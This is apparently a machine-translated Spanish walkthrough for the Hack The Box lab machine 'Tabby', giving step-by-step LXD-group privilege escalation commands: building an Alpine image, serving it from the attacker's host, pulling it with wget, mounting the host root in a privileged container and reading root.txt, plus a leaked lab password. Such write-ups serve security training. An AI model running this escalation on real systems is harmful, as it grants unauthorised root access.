Este es un tutorial o una solución de marca raíz para la máquina TABBY en Hack The Box. Esta máquina es una máquina basada en Linux en la que tenemos que ser root y usuario. Su nivel de dificultad es fácil y tiene una IP 10.10.10.194 para mi y podría depender de tu cuenta.
El enlace de la máquina es https://www.hackthebox.eu/home/machines/profile/259 . Siga los pasos para obtener el indicador de usuario antes de seguir primero los pasos mencionados a continuación.
Pasos para obtener la bandera raíz de la máquina
1. Cuando ingresamos el comando id en el usuario ash, encontramos que el usuario ash es miembro del grupo lxd. Así que probé la escalada de privilegios con LXD. Para hacerlo, ingrese el siguiente conjunto de comandos en su sistema local.
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder/ sudo bash build-alpine
2. Creará un archivo tar.gz como se muestra a continuación
3. Ahora, copie este archivo tar.gz a la carpeta /var/www/html usando el comando que se muestra a continuación
sudo cp alpine-v3.12-x86_64-20200806_0441.tar.gz /var/www/html
Reemplace el archivo alipne tar.gz con el archivo respectivo generado en el sistema local.
4. Ejecute el servidor Apache para alojar el mismo usando el siguiente comando.
sudo service apache2 restart
5. Vaya a la terminal con un shell de máquina e ingrese el siguiente conjunto de comandos para cambiar el usuario a cenizas.
su ash
Esto le pedirá una contraseña, ingrese la contraseña » admin@it » allí. Ahora tenemos que escribir permiso en el directorio de inicio de Ash, y tenemos que descargar el archivo en el mismo. Entonces, para hacer eso, cambie al directorio de inicio del usuario de Ash usando el siguiente comando.
cd /home/ash
6. Ahora estamos en el directorio de inicio de ash y ahora podemos descargar nuestro archivo alpine tar.gz. Use el siguiente comando para descargar el mismo en el directorio de inicio del usuario de Ash.
wget http://<hackthebox_ip>/alpine-v3.12-x86_64-20200806_0441.tar.gz
reemplace <hackthebox_ip> con su respectiva dirección IP de hackthebox.
7. Importe la nueva imagen lxc después de descargar el archivo tar.gz con el alias liquid e ingrese el siguiente comando para hacer lo mismo.
lxc image import ./alpine-v3.12-x86_64-20200806_0441.tar.gz --alias liquid
Reemplace el archivo alipne tar.gz con el archivo respectivo generado en el sistema local.
8. Enumere las imágenes para verificar si la imagen se creó correctamente o no e ingrese el siguiente comando para la misma.
lxc image list
9. Ahora, toda la configuración está lista, es hora de inicializar el lxd con el siguiente comando.
lxd init
10. Ingrese el siguiente comando ahora para cambiar el privilegio de seguridad a verdadero para liquid y privesc.
lxc init liquid privesc -c security.privileged=true
11. Monte la fuente en la raíz para obtener la terminal.
lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
12. Ingrese la siguiente secuencia de comandos para obtener el terminal de la configuración anterior.
lxc start privesc lxc exec privesc /bin/sh id
13. Desde el complemento anterior, el comando id confirma que ahora estamos conectados como root.
14. Ingrese los siguientes comandos para obtener el hash del indicador de usuario raíz.
cd /mnt/root cd root ls cat root.txt
Y ahí vamos, tenemos el indicador de raíz para el usuario, así como la raíz ahora.